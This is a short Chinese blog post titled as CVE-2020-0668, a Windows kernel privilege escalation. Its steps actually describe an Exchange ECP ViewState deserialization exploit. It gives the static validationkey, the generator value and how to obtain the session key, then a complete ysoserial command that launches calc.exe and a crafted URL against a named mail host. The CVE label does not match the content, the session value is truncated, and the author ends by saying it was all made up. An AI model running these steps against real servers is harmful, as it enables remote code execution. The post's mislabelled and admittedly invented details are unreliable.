1. 程式人生 > 實用技巧 >CVE-2020-0668(Microsoft Windows Kernel許可權提升漏洞)

CVE-2020-0668(Microsoft Windows Kernel許可權提升漏洞)

  • 目標:mail.sync.net

1.需要四個引數,分別為:

--validationkey = CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF(預設,漏洞產生原因)
--validationalg = SHA1(預設,漏洞產生原因)
--generator=B97B4E27(基本預設)
--viewstateuserkey = ASP.NET_SessionId(手工獲取,變數,每次登陸都不一致)
	獲取方式:普通賬號登入https://ip/ecp/default.aspx	viewstateuserkey位於default.aspx-->Headers-->ASP.NET_SessionId中:

99566ec5-d60166d1477410aa-4576-a8b9-

2.生成序列化資料,(彈個計算器)

ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "cmd /c calc.exe" --validationalg="SHA1" --validationkey="CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF" --generator="B97B4E27" --viewstateuserkey="99566ec5-d60166d1477410aa-4576-a8b9-" --isdebug –islegacy

3.序列化資料url編碼:

無圖

4.構造連結並訪問:

https://mail.sync.net/ecp/default.aspx?__VIEWSTATEGENERATOR=B97B4E27&__VIEWSTATE=

目標機器上彈出計算器,此處無圖, 因為上面的東西都是我瞎編的瞎編的瞎編的瞎編的瞎編的